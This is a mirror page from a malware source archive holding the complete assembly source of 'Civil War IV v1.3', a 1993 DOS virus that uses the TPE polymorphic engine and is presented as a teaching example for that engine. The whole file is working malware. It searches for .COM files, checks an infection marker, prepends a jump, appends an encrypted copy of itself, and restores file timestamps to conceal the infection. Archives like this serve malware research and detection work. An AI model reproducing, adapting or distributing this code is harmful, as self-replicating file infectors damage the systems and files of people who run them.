mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
202 lines
7.1 KiB
NASM
202 lines
7.1 KiB
NASM
|
;****************************************************************************
|
||
|
;* Civil War IV v1.3 *
|
||
|
;* *
|
||
|
;* Assembled with Tasm 2.5 *
|
||
|
;* *
|
||
|
;* (c) Jan '93 by Dark Helmet, The Netherlands. *
|
||
|
;* The author takes no responsibilty for any damages caused by the virus *
|
||
|
;* *
|
||
|
;* This is a example virus with the TPE engine for teaching you how to *
|
||
|
;* use the TPE engine. *
|
||
|
;* *
|
||
|
;*--------------------------------------------------------------------------*
|
||
|
;* *
|
||
|
;* Notes: *
|
||
|
;* *
|
||
|
;* This virus is NOT dedicated to Sara Gordon, but to all the innocent *
|
||
|
;* people who are killed in Yugoslavia. *
|
||
|
;* *
|
||
|
;* The text in the virus is taken from the song Civil War (hence the name) *
|
||
|
;* by Guns and Roses, Use Your Illusion II, we hope they don't mind it. *
|
||
|
;* *
|
||
|
;* The first name for the virus was NAVIGATOR II, because the virus is *
|
||
|
;* based on the NAVIGATOR virus (also written by me, a while back), but *
|
||
|
;* since I decided to put the songtext in it I renamed it to Civil War IV *
|
||
|
;* *
|
||
|
;* You need the TPE 1.3 engine to link this program. * *
|
||
|
;* *
|
||
|
;****************************************************************************
|
||
|
|
||
|
.model tiny
|
||
|
.radix 16
|
||
|
.code
|
||
|
|
||
|
extrn rnd_init:near
|
||
|
extrn rnd_get:near
|
||
|
extrn crypt:near
|
||
|
extrn tpe_top:near
|
||
|
|
||
|
org 100h
|
||
|
|
||
|
len equ offset tpe_top - begin
|
||
|
|
||
|
Dummy: db 0e9h, 03h, 00h, 44h, 48h, 00h
|
||
|
|
||
|
Begin: call virus ; calculate delta offset
|
||
|
|
||
|
Virus: pop bp
|
||
|
sub bp,offset virus
|
||
|
|
||
|
mov dx,0fe00h ; DTA instellen
|
||
|
mov ah,1ah
|
||
|
int 21h
|
||
|
|
||
|
Restore_begin: call rnd_init ; init random generator
|
||
|
mov di,0100h
|
||
|
lea si,ds:[buffer+bp]
|
||
|
mov cx,06h
|
||
|
rep movsb
|
||
|
|
||
|
First: lea dx,[com_mask+bp] ;get first COM file
|
||
|
mov ah,04eh
|
||
|
xor cx,cx
|
||
|
int 21h
|
||
|
|
||
|
Open_file: call rnd_get
|
||
|
mov ax,03d02h ;open for READ/WRITE
|
||
|
mov dx,0fe1eh
|
||
|
int 21h
|
||
|
mov [handle+bp],ax
|
||
|
xchg ax,bx
|
||
|
|
||
|
Read_date: mov ax,05700h ;store date/time for later
|
||
|
int 21h ;use
|
||
|
mov [date+bp],dx
|
||
|
mov [time+bp],cx
|
||
|
|
||
|
Check_infect: mov bx,[handle+bp] ;check if initials present in
|
||
|
mov ah,03fh ;file
|
||
|
mov cx,06h
|
||
|
lea dx,[buffer+bp]
|
||
|
int 21h
|
||
|
|
||
|
mov al,byte ptr [buffer+bp]+3 ;Compare initials
|
||
|
mov ah,byte ptr [buffer+bp]+4
|
||
|
cmp ax,[initials+bp]
|
||
|
jne infect_file ;if initials not present
|
||
|
;start infecting file
|
||
|
|
||
|
Close_file: mov bx,[handle+bp] ;close file
|
||
|
mov ah,3eh
|
||
|
int 21h
|
||
|
|
||
|
Next_file: mov ah,4fh ;get next COM file
|
||
|
int 21h ;in directorie
|
||
|
jnb open_file
|
||
|
jmp exit
|
||
|
|
||
|
Infect_file: mov ax,word ptr [cs:0fe1ah] ;get lenght of file
|
||
|
sub ax,03h
|
||
|
mov [lenght+bp],ax
|
||
|
mov ax,04200h ;goto begin of file
|
||
|
call move_pointer
|
||
|
|
||
|
Write_jump: mov ah,40h ;Write JUMP intruction
|
||
|
mov cx,01h
|
||
|
lea dx,[jump+bp]
|
||
|
int 21h
|
||
|
|
||
|
mov ah,40h ;Write JUMP offset
|
||
|
mov cx,02h
|
||
|
lea dx,[lenght+bp]
|
||
|
int 21h
|
||
|
|
||
|
mov ah,40 ;Write initials to check
|
||
|
mov cx,02h ;for infection later
|
||
|
lea dx,[initials+bp]
|
||
|
int 21h
|
||
|
|
||
|
mov ax,4202h ; move to end of file
|
||
|
call move_pointer ; for infection
|
||
|
|
||
|
;*****************************************************************************
|
||
|
; T P E *
|
||
|
;*****************************************************************************
|
||
|
|
||
|
Encrypt: push bp ; BP = delta offset
|
||
|
; push delta offset on stack
|
||
|
; for later use.
|
||
|
|
||
|
mov ax,cs ; Calculate worksegment
|
||
|
add ax,01000h
|
||
|
mov es,ax ; ES point to decrypt virus
|
||
|
|
||
|
lea dx,[begin+bp] ; DS:DX begin encryption
|
||
|
|
||
|
mov cx,len ; virus lenght
|
||
|
|
||
|
mov bp,[lenght+bp] ; decryption starts at this
|
||
|
add bp,103h ; point
|
||
|
|
||
|
xor si,si ; distance between decryptor
|
||
|
; and encrypted code is 0 bytes
|
||
|
|
||
|
call rnd_get ; AX = random value
|
||
|
call crypt ; encrypt virus
|
||
|
|
||
|
pop bp ; BP = delta offset
|
||
|
; get delta offset of stack
|
||
|
|
||
|
;******************************************************************************
|
||
|
; T P E - E N D *
|
||
|
;******************************************************************************
|
||
|
|
||
|
Write_virus: mov bx,[handle+bp]
|
||
|
mov ah,40h
|
||
|
int 21h
|
||
|
|
||
|
Restore_date: mov ax,05701h
|
||
|
mov bx,[handle+bp]
|
||
|
mov cx,[time+bp]
|
||
|
mov dx,[date+bp]
|
||
|
int 21h
|
||
|
|
||
|
mov bx,[handle+bp] ; close file
|
||
|
mov ah,3eh
|
||
|
int 21h
|
||
|
|
||
|
Exit: mov ax,cs ; restore registers
|
||
|
mov ds,ax
|
||
|
mov es,ax
|
||
|
mov bx,0100h ; jump to start program
|
||
|
jmp bx
|
||
|
|
||
|
;----------------------------------------------------------------------------
|
||
|
|
||
|
move_pointer: mov bx,[handle+bp]
|
||
|
xor cx,cx
|
||
|
xor dx,dx
|
||
|
int 21h
|
||
|
ret
|
||
|
|
||
|
;----------------------------------------------------------------------------
|
||
|
v_name db "Civil War IV v1.3, (c) Jan '93 "
|
||
|
com_mask db "*.com",0
|
||
|
handle dw ?
|
||
|
date dw ?
|
||
|
time dw ?
|
||
|
buffer db 090h,0cdh,020h,044h,048h,00h
|
||
|
initials dw 4844h
|
||
|
lenght dw ?
|
||
|
jump db 0e9h,0
|
||
|
message db "For all i've seen has changed my mind"
|
||
|
db "But still the wars go on as the years go by"
|
||
|
db "With no love of God or human rights"
|
||
|
db "'Cause all these dreams are swept aside"
|
||
|
db "By bloody hands of the hypnotized"
|
||
|
db "Who carry the cross of homicide"
|
||
|
db "And history bears the scars of our Civil Wars."
|
||
|
writer db "[ DH / TridenT ]",00
|
||
|
|
||
|
end dummy
|